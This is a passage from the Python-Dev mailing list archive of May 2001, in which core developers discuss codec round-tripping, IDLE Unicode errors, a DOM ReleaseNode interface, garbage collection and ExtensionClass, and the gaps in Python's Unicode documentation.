doesn't survive the round trip anymore. The "right" thing to do here, is to simply remove cp875 from the test for round-tripping. It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too. 
The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson at fourthought.com Sun May 13 20:15:46 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. 
Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite at lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Sun May 13 20:31:42 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . 
> It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. > > If their mappings are broken, we can't do much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin at loewis.home.cs.tu-berlin.de Sun May 13 21:08:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? 
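Option (b) from Martin's list, with (a) and (c) as fallbacks, might look like the following Python 3 sketch. The `releaseNode` method on the DOM implementation is only the name proposed in this thread. It is not an existing W3C, PyXML, or 4Suite API. Of the calls used here, only minidom's `unlink()` comes from a real library. The function `release_node` is hypothetical and returns a label naming the strategy it used, purely so its behaviour is easy to check.

```python
import xml.dom.minidom


def release_node(node):
    """Release a DOM node without knowing which DOM implementation created it.

    Tries, in order: a releaseNode() method on the owning document's
    DOMImplementation (option b), the node's own unlink() method as in
    minidom (option a), and finally nothing at all, leaving cleanup to
    reference counting and the garbage collector (option c).
    Returns a label naming the strategy that was used.
    """
    if node.nodeType == node.DOCUMENT_NODE:
        document = node
    else:
        document = node.ownerDocument
    implementation = getattr(document, "implementation", None)
    release = getattr(implementation, "releaseNode", None)
    if release is not None:
        release(node)
        return "implementation"
    unlink = getattr(node, "unlink", None)
    if unlink is not None:
        unlink()
        return "unlink"
    return "gc"


doc = xml.dom.minidom.parseString("<root><child/></root>")
print(release_node(doc))  # unlink: minidom's implementation has no releaseNode
```

Probing with `getattr` avoids hard imports of every known DOM package, which is the problem the `isinstance` checks above run into. The cost is that a DOM which happens to define an unrelated `unlink` method would be called anyway.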
Regards, Martin From tim.one at home.com Sun May 13 21:45:40 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one at home.com Sun May 13 22:54:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: [/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each.
In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely. The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's an x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one at home.com Sun May 13 23:00:32 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip at pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import.
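The diagnostic suggested here looks roughly like this in modern Python 3. It is a sketch, not the actual test___all__ code, and the helper name `report_import_failures` is hypothetical. It binds the exception with `except ImportError as exc` (the 2001 spelling was `except ImportError, msg`) and reports which module actually failed to import:

```python
import importlib

def report_import_failures(module_names):
    """Try to import each module; return {name: error message} for failures."""
    failures = {}
    for name in module_names:
        try:
            importlib.import_module(name)
        except ImportError as exc:
            # exc.name (Python 3.3+) names the module that really failed,
            # which may be a dependency (e.g. termios) rather than `name`.
            failures[name] = f"{exc} (missing: {exc.name})"
    return failures

if __name__ == "__main__":
    # "no_such_module_xyz" is a deliberately nonexistent, hypothetical name.
    results = report_import_failures(["os", "json", "no_such_module_xyz"])
    for name, msg in results.items():
        print(name, "->", msg)
```

Reporting `exc.name` as well as the message is what turns "pty failed" into "pty failed because termios is missing", which is the information this thread needed.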
Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido at digicool.com Mon May 14 00:26:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. 
> > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but may be I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:37:44 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking it's nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical quesion, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code! 
) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClasses (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support it just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:43:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later!
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:51:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed? 
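The UnicodeError in this report is what happens when a string containing non-ASCII characters is forced through the ASCII codec. Here is a minimal Python 3 reproduction using the two characters from the postscript ('\xe4\xf6', a-umlaut and o-umlaut). It is a sketch under one assumption: in 2001 the implicit conversion happened inside Tkinter/IDLE, not through an explicit `.encode()` call as shown here. `try_encode` is a hypothetical helper:

```python
s = "\xe4\xf6"   # the two characters from the postscript: a-umlaut, o-umlaut

def try_encode(text, encoding):
    """Encode text, returning bytes or the error reason on failure."""
    try:
        return text.encode(encoding)
    except UnicodeEncodeError as exc:
        return f"UnicodeEncodeError: {exc.reason}"

print(try_encode(s, "ascii"))    # fails: ordinal not in range(128)
print(try_encode(s, "latin-1"))  # b'\xe4\xf6'
print(try_encode(s, "utf-8"))    # b'\xc3\xa4\xc3\xb6'
```

The same two characters are representable in Latin-1 and UTF-8, so the failure depends only on which codec the conversion picks implicitly.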
--Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson at fourthought.com Mon May 14 03:02:03 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH at ActiveState.com Mon May 14 03:37:35 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. 
- Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, altough the default encoding for that platform will be other than > 'mbcs'. > On operating system that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use it's default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one at home.com Mon May 14 04:52:22 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc. 
OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far is it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors. 
What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encoding" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this; I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so: once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry at digicool.com Mon May 14 06:16:18 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr at thyrsus.com Mon May 14 07:20:17 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few things: 1. Somebody seems to have removed Andrew Kuchling's name from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg at cosc.canterbury.ac.nz Mon May 14 07:36:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. From martin at loewis.home.cs.tu-berlin.de Mon May 14 07:38:24 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal at lemburg.com Mon May 14 11:02:19 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? 
That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 14 11:15:43 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. 
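Here is the kind of worked example the docs are said to lack. The sketch below shows what the error-handling schemes Tim asks about ('strict', 'ignore', 'replace') do in Python 3, where `str.encode()` and `bytes.decode()` took over the roles of the `.encode()` method and the `unicode()` builtin discussed in this thread. It describes the modern API only, not the exact 2001 behavior (for example, modern Python raises UnicodeEncodeError/UnicodeDecodeError, subclasses of ValueError):

```python
text = "na\xefve caf\xe9"         # "naive cafe" with i-diaeresis and e-acute

# Encoding to ASCII: 'strict' raises, 'ignore' drops, 'replace' substitutes '?'.
try:
    text.encode("ascii")          # errors="strict" is the default
except UnicodeEncodeError as exc:
    print("strict:", exc.reason)  # ordinal not in range(128)
print("ignore: ", text.encode("ascii", errors="ignore"))   # b'nave caf'
print("replace:", text.encode("ascii", errors="replace"))  # b'na?ve caf?'

# Decoding invalid UTF-8 raises UnicodeDecodeError under 'strict';
# 'replace' inserts U+FFFD REPLACEMENT CHARACTER, 'ignore' drops the bytes.
data = b"caf\xe9"                 # Latin-1 bytes, not valid UTF-8
print("decode replace:", ascii(data.decode("utf-8", errors="replace")))
print("decode ignore: ", ascii(data.decode("utf-8", errors="ignore")))
```

The decode half also answers the "how do encoding errors arise from a function that decodes?" question: the error is raised when the input bytes are not valid in the named encoding.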
